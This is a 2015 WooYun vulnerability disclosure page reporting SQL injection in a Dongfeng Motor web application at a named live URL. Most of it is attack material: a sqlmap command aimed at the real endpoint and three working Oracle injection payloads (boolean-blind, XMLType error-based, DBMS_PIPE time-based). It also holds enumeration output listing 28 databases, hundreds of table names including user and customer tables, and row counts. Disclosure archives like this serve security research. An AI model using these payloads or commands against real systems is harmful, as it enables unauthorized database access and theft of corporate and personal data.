当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0162260

漏洞标题:中国500强之东风汽车股份有限公司SQL注入,泄露28个库

相关厂商:dfyb.com

漏洞作者: 逆流冰河

提交时间:2015-12-20 11:25

修复时间:2015-12-25 11:26

公开时间:2015-12-25 11:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-20: 细节已通知厂商并且等待厂商处理中
2015-12-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题,这个不会还是小厂商吧

详细说明:

1,注入信息:sqlmap -u "http://zhpt.dfl.com.cn/pipms/client/news_view.jsp?id=294" --batch
2,poc
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=294' AND 8716=8716 AND 'tGIE'='tGIE
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=294' AND 3400=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(112)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (3400=3400) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(98)||CHR(113)||CHR(106)||CHR(113)||CHR(62))) FROM DUAL) AND 'LJuO'='LJuO
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=294' AND 6602=DBMS_PIPE.RECEIVE_MESSAGE(CHR(108)||CHR(109)||CHR(122)||CHR(103),5) AND 'KxZa'='KxZa
---
web application technology: JSP
back-end DBMS: Oracle
available databases [28]:
[*] CTXSYS
[*] GI
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PIP_V
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SMP_BAK
[*] SMP_DBA
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
3,随便看一个库,尽然这么多表
Database: SMP_DBA
[546 tables]
+--------------------------------+
| AAA080923MARA |
| AAA_INDATA |
| AAA_MARA080925 |
| AAA_TEST |
| AA_TEST |
| AFACT |
| APLAN |
| ARUKU1 |
| FLJS200703_VBAK |
| FLJS_200701_02 |
| FLJS_200701_02_VBAK |
| FLXT200703 |
| FLXT2007_01_02_VBRK |
| JUDGE_ANNEX |
| JUDGE_AUDITING |
| JUDGE_CARSPEED |
| JUDGE_DECLARE |
| JUDGE_DRIVING |
| JUDGE_OIL |
| JUDGE_PIP_GUID |
| JUDGE_PRODUCT |
| JUDGE_USER_AREA |
| JUDGE_USER_RANGE |
| LOG4J |
| MDP_DATE |
| NI_ANSWER |
| NI_INVESTIGATION |
| NI_INVESTIGATIONTASK |
| NI_PROBLEMBASE |
| NI_PROBLEMBASE_TEMP |
| NI_QUESTION |
| ONI_AGENT |
| ONI_AGENTFORECAST |
| ONI_ANSWER |
| ONI_CHARTTYPE |
| ONI_CUSTOMERINFO |
| ONI_DCWJDAB |
| ONI_DCWJJG |
| ONI_DCWJTK |
| ONI_DCWJTMB |
| ONI_DCWJZB |
| ONI_DCWJZT |
| ONI_FWSCB |
| ONI_FWWL |
| ONI_INCOME |
| ONI_INVESTIGATION |
| ONI_INVESTIGATIONTASK |
| ONI_ISALE |
| ONI_LXZD |
| ONI_OPTION |
| ONI_PJJGB |
| ONI_PJJYB |
| ONI_POLICY |
| ONI_QUESTION |
| ONI_QUESTIONBASE |
| ONI_SMAINTAIN |
| ONI_TYPEDICTIONARY |
| ONI_TYPETAB |
| ONI_XQHYB |
| ONI_XQHYJZB |
| ONI_XZQY |
| ONI_ZTSRB |
| PIP_CAB |
| PIP_CESHI |
| PIP_CHPDPK |
| PIP_CHPDPKTEMP |
| PIP_CHPDPK_BAK20110411 |
| PIP_CHPDPK_BAK20110511 |
| PIP_CHPDPK_BAK20110518 |
| PIP_CHPDPK_BAK20110611 |
| PIP_CLCP |
| PIP_CLCPTEMP |
| PIP_CLCP_BAK20110411 |
| PIP_CLCP_BAK20110511 |
| PIP_CLCP_BAK20110518 |
| PIP_CLCP_BAK20110611 |
| PIP_CLXBB |
| PIP_ENGINE |
| PIP_FILERELATION |
| PIP_GEARBOX |
| PIP_INPUT_TEMP |
| PIP_NEWS |
| PIP_NOTEUPLOAD |
| PIP_PRODUCT |
| PIP_PRODUCT_BAK110215 |
| PIP_PRODUCT_TEMP |
| PIP_PROTYPE |
| PIP_PRO_NOTE |
| PIP_REFITTYPE |
| PIP_RELATION |
| PIP_SHIFT |
| PIP_SYSLOG |
| PIP_TUBETRIGONALSIZE |
| PIP_UPFILE |
| PIP_UPFILETYPE |
| PIP_UPFILETYPE2 |
| PIP_UPFILE_BAK201102 |
| PLAN_TABLE |
| RP_CAB |
| RP_CARSORT |
| RP_CARSORT1 |
| RP_CKMX |
| RP_DRIVER |
| RP_ENGINE |
| RP_FUEL |
| RP_INSTORE |
| RP_INVOICEBYMONTH |
| RP_MATERIAL |
| RP_OUTSTORE |
| RP_PRODUCTTYPE |
| RP_PR_CARTYPECLASS |
| RP_PR_FACTORY |
| RP_PR_PROVINCE |
| RP_PR_SALEINFO |
| RP_PR_SALEINFO_EX_CON |
| RP_PR_SCJHSM |
| RP_PR_TEMP_AREA |
| RP_PR_TEMP_CAKY |
| RP_PR_TEMP_HISTOGRAMA |
| RP_PR_TEMP_HISTOGRAMB |
| RP_PR_TEMP_MAINCAR |
| RP_PR_TEMP_MONTHLY |
| RP_PR_XSLXB |
| RP_PR_XSLXYEAR |
| RP_PR_ZHRCK |
| RP_PR_ZHRCKYEAR |
| RP_PURCHASER |
| RP_RKMX |
| RP_SAP_CKDPH |
| RP_SAP_CKMX |
| RP_SAP_MATERIAL |
| RP_SAP_RKMX |
| RP_SAP_RKMXYW |
| RP_SAP_SWCK |
| RP_SAP_SWRK |
| RP_SAP_SWRKMX |
| RP_SAP_ZMKC |
| RP_SCJH |
| RP_SELLORG |
| RP_SHHKC |
| RP_SOCIALSTORE |
| RP_STORE |
| RP_STOREBAK |
| RP_STYLE |
| RP_TERMINALOUT |
| RP_V_SCJH |
| RP_ZHDKC |
| RP_ZHKC |
| SAP_A017 |
| SAP_A018 |
| SAP_A922 |
| SAP_A970 |
| SAP_A972 |
| SAP_A975 |
| SAP_A976 |
| SAP_A978 |
| SAP_A979 |
| SAP_A984 |
| SAP_A986 |
| SAP_A988 |
| SAP_A989 |
| SAP_A991 |
| SAP_ADRC |
| SAP_AUART |
| SAP_BONUS |
| SAP_BWKEY |
| SAP_BWTTY |
| SAP_BZIRK |
| SAP_EINA |
| SAP_EINE |
| SAP_EKET |
| SAP_EKKO |
| SAP_EKPO |
| SAP_EQUI |
| SAP_FWZ |
| SAP_HKXX |
| SAP_INSMK |
| SAP_JLB |
| SAP_KDGRP |
| SAP_KFRST |
| SAP_KNA1 |
| SAP_KNBK |
| SAP_KNVP |
| SAP_KNVV |
| SAP_KONDA |
| SAP_KONH |
| SAP_KONP |
| SAP_KONV |
| SAP_KTOKK |
| SAP_KUKLA |
| SAP_LFA1 |
| SAP_LFART |
| SAP_LGORT |
| SAP_LIKP |
| SAP_LIPS |
| SAP_MAKT |
| SAP_MARA |
| SAP_MARC |
| SAP_MARD |
| SAP_MARK |
| SAP_MATKL |
| SAP_MBEW |
| SAP_MBEWH |
| SAP_MCHA |
| SAP_MCHB |
| SAP_MKPF |
| SAP_MSEG |
| SAP_MSKU |
| SAP_MSTA |
| SAP_MTART |
| SAP_MVKE |
| SAP_OBJK |
| SAP_PARVW |
| SAP_PAYTERM |
| SAP_PORDER_LXZD |
| SAP_PROVG |
| SAP_PSTYV |
| SAP_REGIO |
| SAP_S920 |
| SAP_S921 |
| SAP_SER01 |
| SAP_SER02 |
| SAP_SER03 |
| SAP_SPART |
| SAP_SSKC |
| SAP_TEMP_A017 |
| SAP_TEMP_A018 |
| SAP_TEMP_A922 |
| SAP_TEMP_A970 |
| SAP_TEMP_A972 |
| SAP_TEMP_A975 |
| SAP_TEMP_A976 |
| SAP_TEMP_A978 |
| SAP_TEMP_A979 |
| SAP_TEMP_A984 |
| SAP_TEMP_A986 |
| SAP_TEMP_A988 |
| SAP_TEMP_A989 |
| SAP_TEMP_A991 |
| SAP_TEMP_ADRC |
| SAP_TEMP_EINA |
| SAP_TEMP_EINE |
| SAP_TEMP_EKET |
| SAP_TEMP_EKKO |
| SAP_TEMP_EKPO |
| SAP_TEMP_EQUI |
| SAP_TEMP_FWZ |
| SAP_TEMP_HKXX |
| SAP_TEMP_JLB |
| SAP_TEMP_KNA1 |
| SAP_TEMP_KNBK |
| SAP_TEMP_KNVP |
| SAP_TEMP_KNVV |
| SAP_TEMP_KONH |
| SAP_TEMP_KONP |
| SAP_TEMP_KONV |
| SAP_TEMP_LFA1 |
| SAP_TEMP_LIKP |
| SAP_TEMP_LIPS |
| SAP_TEMP_MAKT |
| SAP_TEMP_MARA |
| SAP_TEMP_MARC |
| SAP_TEMP_MARD |
| SAP_TEMP_MARK |
| SAP_TEMP_MBEW |
| SAP_TEMP_MBEWH |
| SAP_TEMP_MCHA |
| SAP_TEMP_MCHB |
| SAP_TEMP_MKPF |
| SAP_TEMP_MSEG |
| SAP_TEMP_MSKU |
| SAP_TEMP_MSTA |
| SAP_TEMP_MVKE |
| SAP_TEMP_OBJK |
| SAP_TEMP_OBJK_BAK |
| SAP_TEMP_S920 |
| SAP_TEMP_S921 |
| SAP_TEMP_SER01 |
| SAP_TEMP_SER02 |
| SAP_TEMP_SER03 |
| SAP_TEMP_SSKC |
| SAP_TEMP_TVM1T |
| SAP_TEMP_TVM2T |
| SAP_TEMP_TVM3T |
| SAP_TEMP_TVM4T |
| SAP_TEMP_TVM5T |
| SAP_TEMP_VBAK |
| SAP_TEMP_VBAP |
| SAP_TEMP_VBFA |
| SAP_TEMP_VBKD |
| SAP_TEMP_VBPA |
| SAP_TEMP_VBRK |
| SAP_TEMP_VBRP |
| SAP_TEMP_VBUK |
| SAP_TEMP_ZYMX |
| SAP_TRATY |
| SAP_TVM1T |
| SAP_TVM2T |
| SAP_TVM3T |
| SAP_TVM4T |
| SAP_TVM5T |
| SAP_VBAK |
| SAP_VBAP |
| SAP_VBFA |
| SAP_VBKD |
| SAP_VBPA |
| SAP_VBRK |
| SAP_VBRP |
| SAP_VBTYP |
| SAP_VBUK |
| SAP_VERSG |
| SAP_VERSGM |
| SAP_VERTT |
| SAP_VKBUR |
| SAP_VKGRP |
| SAP_VKORG |
| SAP_VSART |
| SAP_VSBED |
| SAP_VSMTA |
| SAP_VTWEG |
| SAP_VWERK |
| SAP_WERKS |
| SAP_ZLSCH |
| SAP_ZYMX |
| SAP_ZZTNS |
| SAP_ZZTNV |
| SMP_DAILY_SAPDPH |
| SMP_MATER_FIRST |
| SMP_NOTICE_NOTICE |
| SMP_NOTICE_NOTICEREADER |
| SMP_ORG_CREDIT |
| SMP_ORG_DEPARTINFO |
| SMP_ORG_EMPLOYEEINFO |
| SMP_ORG_GROUPSET |
| SMP_ORG_MENUUSER |
| SMP_ORG_NOTETYPE |
| SMP_ORG_POSITIONINFO |
| SMP_ORG_POSITIONSET |
| SMP_ORG_PRIORITY |
| SMP_ORG_PRIORITYSET |
| SMP_ORG_USERGROUPINFO |
| SMP_ORG_USERINFO |
| SMP_PORDER_DICTFACTORY |
| SMP_PORDER_DICTORDERTYPE |
| SMP_PORDER_DICTSTATUS |
| SMP_PORDER_IMPORTSAPLOG |
| SMP_PORDER_MATE_BLACK |
| SMP_PORDER_MATE_MATCH |
| SMP_PORDER_MATE_REPLACE |
| SMP_PORDER_MATE_SPECIAL |
| SMP_PORDER_MATE_STOCK |
| SMP_PORDER_MATE_STOCKLOG |
| SMP_PORDER_MATE_VALID |
| SMP_PORDER_NEEDREPORT |
| SMP_PORDER_NOTICE |
| SMP_PORDER_NOTICEREADER |
| SMP_PORDER_ORDER |
| SMP_PORDER_ORDERITEM |
| SMP_PORDER_RANGE |
| SMP_PORDER_ROLESETTING |
| SMP_PORDER_SALESDETAIL |
| SMP_PORDER_SAPAREA |
| SMP_PORDER_SAPCLIENT |
| SMP_PORDER_SAPCLIENTFRIEND |
| SMP_PORDER_SAPMATERIAL |
| SMP_PORDER_SAPMATERIAL_0514 |
| SMP_PORDER_SAPSALESAREA |
| SMP_PORDER_SAPSALESGROUP |
| SMP_PORDER_SAPSALESOFFICE |
| SMP_PORDER_SAPVENDOR |
| SMP_PORDER_TRANSINFO |
| SMP_PORDER_URGITEMSTATUS |
| SMP_PORDER_URGORDER |
| SMP_PORDER_URGORDERDEAL |
| SMP_PORDER_URGORDERITEM |
| SMP_PORDER_URGORDERTYPE |
| SMP_PORDER_VISITLOG |
| SMP_REPORT_SOURCE |
| SMP_SAP_MATER |
| SMP_SAP_MATER_EXCLUDE |
| SMP_TADMEASURE_AREA |
| SMP_TADMEASURE_DEALER |
| SMP_TDEMAND_CARSERIES |
| SMP_TDEMAND_CARSERIES_1 |
| SMP_TDEMAND_CARTYPE_INF |
| SMP_TDEMAND_CARTYPE_INF_1 |
| SMP_TDEMAND_DEPUTYCARTYPE |
| SMP_TDEMAND_DEPUTYCARTYPE_1 |
| SMP_TDEMAND_MONTH |
| SMP_TDEMAND_PARAMETER |
| SMP_TDEMAND_USEABLE_PLAN |
| SMP_TDEMAND_USEABLE_STORE |
| SMP_TDEMAND_WEEK |
| SMP_THGZ_INFO |
| SMP_THGZ_KC |
| SMP_THGZ_MAIN |
| SMP_THGZ_PLAN |
| SMP_THGZ_PLAN_TEMP |
| SMP_THGZ_PPHZ |
| SMP_THGZ_XYSH_HGZ |
| SMP_THGZ_ZY |
| SMP_TORDER_ASSISTANT |
| SMP_TORDER_CARRYTEMP |
| SMP_TORDER_CARTYPE |
| SMP_TORDER_CARTYPE_CHANGE |
| SMP_TORDER_CERT |
| SMP_TORDER_COLOR |
| SMP_TORDER_COLORA |
| SMP_TORDER_COLOR_ID |
| SMP_TORDER_CYCLE |
| SMP_TORDER_CYCLEA |
| SMP_TORDER_DPH |
| SMP_TORDER_EKBE |
| SMP_TORDER_EKET |
| SMP_TORDER_ESPECIALLY |
| SMP_TORDER_MATERPRICE |
| SMP_TORDER_ORDERA |
| SMP_TORDER_ORDERLIST |
| SMP_TORDER_ORDERMAIN |
| SMP_TORDER_PACT |
| SMP_TORDER_PACTA |
| SMP_TORDER_PLANT |
| SMP_TORDER_PLANT1 |
| SMP_TORDER_PLANT2 |
| SMP_TORDER_PLANT_ARUKU |
| SMP_TORDER_PLANT_BASE |
| SMP_TORDER_PLANT_FACT |
| SMP_TORDER_PLANT_PLANT |
| SMP_TORDER_PLANT_SCM |
| SMP_TORDER_POEDITION |
| SMP_TORDER_POINFO |
| SMP_TORDER_POMONTH |
| SMP_TORDER_POSAP |
| SMP_TORDER_POWEEK |
| SMP_TORDER_RKDPH |
| SMP_TORDER_VSBED |
| SMP_TORDER_ZDDZX |
| SMP_TORDER_ZDDZX_COLLECT |
| SMP_TORDER_ZDDZX_DETAIL |
| SMP_TORDER_ZDDZX_JK |
| SMP_TORDER_ZDDZX_ORDER |
| SMP_TORDER_ZDDZX_PACT |
| SMP_TORDER_ZJHZX |
| SMP_TORDER_ZKBETR |
| SMP_TUSERLOGIN |
| TARGET_CLIENT |
| TARGET_DEPT |
| TCHENGYUNXINXI |
| TDIQU |
| TEMP_SAP_CRM |
| TEMP_SAP_CRM_BAK20130110 |
| TEMP_SJPT |
| TGONGYINGSHANGXINXI |
| TIMPORTSAPLOG |
| TKEHU |
| TKEHUDINGHUOMINGXI |
| TKEHUDINGHUOSHENHE |
| TKEHUDINGHUOXINXI |
| TKEHUHEZUOHUOBANXINXI |
| TKEHU_PJ |
| TKUCUNTONGJIRIZHI |
| TMONTHTARGET |
| TMS_SAP_ORDER |
| TQUANXIAN |
| TQUEHUOWULIAOJILU |
| TSALESINFO |
| TSEASONTARGET |
| TURGORDER |
| TURGORDERDEAL |
| TURGORDERITEM |
| TWULIAOKUCUN |
| TWULIAOXINXI |
| TXIAOSHOUBANSHICHUXINXI |
| TXIAOSHOUDIQUXINXI |
| TXIAOSHOUZUXINXI |
| TXINWULIAOJILU |
| TYEARTARGET |
| TYONGHU |
| TYONGHUZU |
| TYONGHUZUQUANXIAN |
| TYONGHUZUYONGHU |
| USER_USERINFO |
| V_CKSWMX |
| V_CLDA |
| V_CLDA_BAK |
| V_CLXS |
| V_CPDY |
| V_CPKZPJB001 |
| V_CPKZPJB1 |
| V_CPKZPJB2 |
| V_CPKZPJB2_FROMYANG |
| V_CPKZPJB3 |
| V_CPKZPJB_COST |
| V_CXDY |
| V_CXDY_CRM |
| V_DM_CARPRICE |
| V_DM_KH |
| V_HKXX |
| V_HTZX |
| V_HX_FLXT |
| V_HX_FLXTNEW |
| V_HX_JKCRQ |
| V_JKCKC |
| V_JKC_DPHMXB |
| V_JLBXX |
| V_KPXX |
| V_KPXX1 |
| V_NI_JXS |
| V_PORDER_DDBC |
| V_PORDER_FHGZ |
| V_PORDER_FWZZB |
| V_PORDER_JH |
| V_PORDER_JLBZB |
| V_PORDER_KP |
| V_PORDER_LIKP |
| V_PORDER_VBAK |
| V_PORDER_VBPA |
| V_WLKH |
| V_XSMX |
| V_XSMX1 |
| V_XSMX_09 |
| V_XSXX |
| V_ZBXX |
| WIS_SAP_A922 |
| Z25_SMP_TDEMAND_CARSERIES |
| Z25_SMP_TDEMAND_CARTYPE_INF |
| Z25_SMP_TDEMAND_DEPUTYCARTYPE |
| ZBAK_SMP_TDEMAND_CARSERIES |
| ZBAK_SMP_TDEMAND_CARTYPE_INF |
| ZBAK_SMP_TDEMAND_DEPUTYCARTYPE |
| ZCFTEMP |
| ZCFTEMP1 |
| ZL_BAK_SMP_TDEMAND_CARSERIES |
| ZL_CARSERIES_DEPUTYCARTYPE |
| ZL_DEPUTYCARTYPE_CARTYPE |
| ZL_SAP_TEMP_ADRC_0221 |
| ZL_SAP_TEMP_ADRC_0730 |
| ZL_SAP_TEMP_KNA1_0221 |
| ZL_SAP_TEMP_KNA1_0730 |
| ZL_SAP_TEMP_KNBK_0221 |
| ZL_SAP_TEMP_KNBK_0730 |
| ZL_SAP_TEMP_KNBK_BAK_0728 |
| ZL_SAP_TEMP_KNVV_0221 |
| ZL_SAP_TEMP_KNVV_0730 |
| ZL_TEMP_TORDER_COLOR |
| ZL_TMP_HGZ_OUT_2 |
+--------------------------------+
4,数据量挺大的
[22:56:18] [INFO] resumed: 860854
[22:56:18] [INFO] resumed: 3
[22:56:18] [INFO] resumed: 364850
[22:56:18] [INFO] resumed: 93185
[22:56:18] [INFO] resumed: 1377905
[22:56:18] [INFO] resumed: 106353
[22:56:18] [INFO] resumed: 76604
[22:56:18] [INFO] resumed: 1257879
[22:56:18] [INFO] resumed: 23825
[22:56:18] [INFO] resumed: 5248839

漏洞证明:

拒绝小厂商

修复方案:

拒绝小厂商

版权声明:转载请注明来源 逆流冰河@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-12-25 11:26

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评价